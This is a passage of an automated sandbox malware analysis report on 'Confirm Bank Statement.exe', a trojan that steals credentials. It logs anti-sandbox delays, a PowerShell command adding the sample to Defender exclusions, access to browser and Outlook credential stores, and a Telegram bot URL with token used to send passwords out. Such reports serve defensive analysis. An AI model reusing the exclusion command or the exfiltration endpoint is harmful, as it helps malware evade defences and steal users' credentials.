                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 1430000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 3010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 5010000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 8F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 9F90000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: B190000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: B10000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 2990000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: 2740000 memory reserve | memory write watchJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599875Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599753Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599625Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599515Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599406Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599296Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599187Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 599077Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598968Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598859Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598749Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598640Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598531Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598421Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598311Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598203Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 598093Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597984Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597872Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597109Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 597000Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596890Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596781Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596671Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596562Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596449Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596343Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596234Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596124Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 596015Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595906Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595796Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595687Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595578Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595468Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595359Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595250Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595140Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 595031Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594921Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594812Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594703Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeThread delayed: delay time: 594593Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6694Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2101Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeWindow / User API: threadDelayed 8582Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeWindow / User API: threadDelayed 1278Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 5860Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7380Thread sleep time: -3689348814741908s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7340Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep count: 33 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -30437127721620741s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7912Thread sleep count: 8582 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7912Thread sleep count: 1278 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599753s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599515s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599296s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599187s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -599077s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598859s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598749s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598640s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598531s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598421s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598311s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598203s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -598093s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597984s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597872s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -597000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596449s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -596015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595906s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595796s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595687s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595578s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595468s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -595031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe TID: 7908Thread sleep time: -594593s >= -30000sJump to behavior
                    Source: Confirm Bank Statement.exe, 00000004.00000002.3719715761.0000000000C38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeCode function: 4_2_00B5C168 LdrInitializeThunk,LdrInitializeThunk,4_2_00B5C168
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess token adjusted: DebugJump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeMemory allocated: page read and write | page guardJump to behavior

                    HIPS / PFW / Operating System Protection Evasion

                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Confirm Bank Statement.exe"
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exeProcess created: C:\Users\user\Desktop\Confirm Bank Statement.exe "C:\Users\user\Desktop\Confirm Bank Statement.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                    Stealing of Sensitive Information

                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.7240000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3431648.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.7240000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3431648.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.320f83c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3156edc.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Users\user\Desktop\Confirm Bank Statement.exe; Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

                    Remote Access Functionality

                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.41d3150.3.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 4.2.Confirm Bank Statement.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.4037590.5.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.4037590.5.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.41d3150.3.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1270907514.0000000004019000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.3717562282.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1270907514.0000000004057000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000004.00000002.3720612902.0000000002AB3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: Process Memory Space: Confirm Bank Statement.exe PID: 5980, type: MEMORYSTR
                    Source: Yara match; File source: Process Memory Space: Confirm Bank Statement.exe PID: 4244, type: MEMORYSTR
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.7240000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3431648.1.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.7240000.6.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3431648.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.320f83c.2.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 0.2.Confirm Bank Statement.exe.3156edc.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match; File source: 00000000.00000002.1274255090.0000000007240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match; File source: 00000000.00000002.1267719440.000000000313C000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

| Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation | 1 DLL Side-Loading | 11 Process Injection | 1 Masquerading | 1 OS Credential Dumping | 1 Query Registry | Remote Services | 1 Email Collection | 1 Web Service | Exfiltration Over Other Network Medium | Abuse Accessibility Features |
| Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 11 Disable or Modify Tools | LSASS Memory | 1 Security Software Discovery | Remote Desktop Protocol | 1 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
| Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 31 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | 1 Data from Local System | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact |
| Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 11 Process Injection | NTDS | 31 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 3 Non-Application Layer Protocol | Traffic Duplication | Data Destruction |
| Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 3 Obfuscated Files or Information | LSA Secrets | 1 Application Window Discovery | SSH | Keylogging | 14 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact |
| Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 2 Software Packing | Cached Domain Credentials | 1 System Network Configuration Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
| DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 DLL Side-Loading | DCSync | 1 File and Directory Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
| Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | 13 System Information Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |


| Source | Detection | Scanner | Label | Link |
|---|---|---|---|---|
| Confirm Bank Statement.exe | 32% | Virustotal | | Browse |
| Confirm Bank Statement.exe | 42% | ReversingLabs | ByteCode-MSIL.Virus.Virut | |
| Confirm Bank Statement.exe | 100% | Joe Sandbox ML | | |

                    No Antivirus matches

| Name | IP | Active | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|---|---|
| reallyfreegeoip.org | 104.21.64.1 | true | false | | high |
| api.telegram.org | 149.154.167.220 | true | false | | high |
| checkip.dyndns.com | 132.226.8.169 | true | false | | high |
| checkip.dyndns.org | unknown | unknown | false | | high |


| Name | Malicious | Antivirus Detection | Reputation |
|---|---|---|---|
| http://checkip.dyndns.org/ | false | | high |
| https://reallyfreegeoip.org/xml/8.46.123.189 | false | | high |
| https://api.telegram.org/bot8161619263:AAGh7P51iOu7fKM21V3X_t2ljzNjQ9YsI9E/sendDocument?chat_id=1780630805&caption=user%20/%20Passwords%20/%208.46.123.189 | false | | high |


| IP | Domain | Country | ASN | ASN Name | Malicious |
|---|---|---|---|---|---|
| 132.226.8.169 | checkip.dyndns.com | United States | 16989 | UTMEMUS | false |
| 149.154.167.220 | api.telegram.org | United Kingdom | 62041 | TELEGRAMRU | false |
| 104.21.64.1 | reallyfreegeoip.org | United States | 13335 | CLOUDFLARENETUS | false |

                                                                        Joe Sandbox version:42.0.0 Malachite
                                                                        Analysis ID:1590892
                                                                        Start date and time:2025-01-14 16:42:25 +01:00
                                                                        Joe Sandbox product:CloudBasic
                                                                        Overall analysis duration:0h 7m 50s
                                                                        Hypervisor based Inspection enabled:false
                                                                        Report type:full
                                                                        Cookbook file name:default.jbs
                                                                        Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                        Number of analysed new started processes analysed:18
                                                                        Number of new started drivers analysed:0
                                                                        Number of existing processes analysed:0
                                                                        Number of existing drivers analysed:0
                                                                        Number of injected processes analysed:0
                                                                        Technologies:
                                                                        • HCA enabled
                                                                        • EGA enabled
                                                                        • AMSI enabled
                                                                        Analysis Mode:default
                                                                        Analysis stop reason:Timeout
                                                                        Sample name:Confirm Bank Statement.exe
                                                                        Detection:MAL
                                                                        Classification:mal100.troj.spyw.evad.winEXE@6/6@3/3
                                                                        EGA Information:
                                                                        • Successful, ratio: 100%
                                                                        HCA Information:
                                                                        • Successful, ratio: 100%
                                                                        • Number of executed functions: 266
                                                                        • Number of non-executed functions: 44
                                                                        Cookbook Comments:
                                                                        • Found application associated with file extension: .exe
                                                                        • Override analysis time to 240000 for current running targets taking high CPU consumption
                                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, sppsvc.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                                                                        • Excluded IPs from analysis (whitelisted): 184.28.90.27, 13.107.246.45, 4.245.163.56
                                                                        • Excluded domains from analysis (whitelisted): fs.microsoft.com, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                        • Not all processes where analyzed, report is missing behavior information
                                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                                        • Report size getting too big, too many NtCreateKey calls found.
                                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                        • Report size getting too big, too many NtQueryValueKey calls found.
